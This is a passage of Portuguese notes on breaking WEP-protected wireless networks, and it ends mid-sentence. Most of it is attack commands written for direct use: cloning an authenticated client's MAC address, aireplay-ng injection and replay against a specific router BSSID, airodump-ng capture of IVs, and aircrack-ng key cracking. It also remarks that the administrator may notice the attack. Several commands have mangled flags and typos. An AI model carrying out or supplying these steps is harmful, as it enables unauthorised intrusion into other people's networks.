Quebrando redes wireless
#Comando para colnar o endereço mac de um cliente que já esteja autenticado com roteador (somente será preciso se você desejar acelerar o processo): sudo macchanger –m 00:26:BB:C2:CB:72 wlan0
Comandos para iniciar e parar a placa de rede: sudo ifconfig start wlan0; sudo ifconfig stop wlan0
Comando para atacar o roteador exigindo pacotes com DATA (acelera todo o processo): -b (BSSID do roteador que vai ser atacado) –h (mac do cliente que foi clonado)
Sudo aireplay-ng -2 –p 512 –c ff:ff:ff:ff:ff:ff –b 00:21:27:E6:35:E6 –h 00:26:BB:C2:CB:72 mon0
Comandos para capturar pacotes do roteador que esta no canal 6 (BSSID) e escrever no arquivo (agoravai e agoravai2) utilizando as interfaces wlan0 e mon0 (mon0 é a interface em modo monitor)
Airodump-ng –channel 6 –bssid 00:21:27:E6:35:E6 --ivs --write agoravai2 wlan0;
Airodump-ng –channel 6 –bssid 00:21:27:E6:35:E6 –ivs –write agoravai2 mon0
#comando para tentar quebrar a senha com 128 bits usando arquivos capturados 1 e 2: aircrack-ng –f4 –n 128 agoravai-01;ivs agoravai2-01.ivs
#tentando quebrar chave de 64 bits: aircrack-ng –n64 agoravai-01.ivs agoravai2-01.ivs
#aireplay –b 00:50:50:81:81:01 –x 512 ath0 -4
Neste ataque, o aireplay captura um weak packet, emitido por algum dos outros micros conectados ao ponto de acesso, e o repete indefinidamente, obrigando o ponto de acesso a responder e assim aumentar rapidamente a contagem de IV’s, o que permite quebrar a chave WEP muito mais rapidamente. Este é o tipo de ataque mais efetivo, pois derruba a última grande barreira contra a quebra do WEP, que era justamente a demora em capturar um grande volume de pacotes.
O “-x 512” especifica o numero de pacotes que serão enviados por segundo. Aumentar o numero permite quebrar a chave mais rapidamente, mas, por outro lado, vai reduzir o desempenho da rede, o que pode levar o administrador a perceber o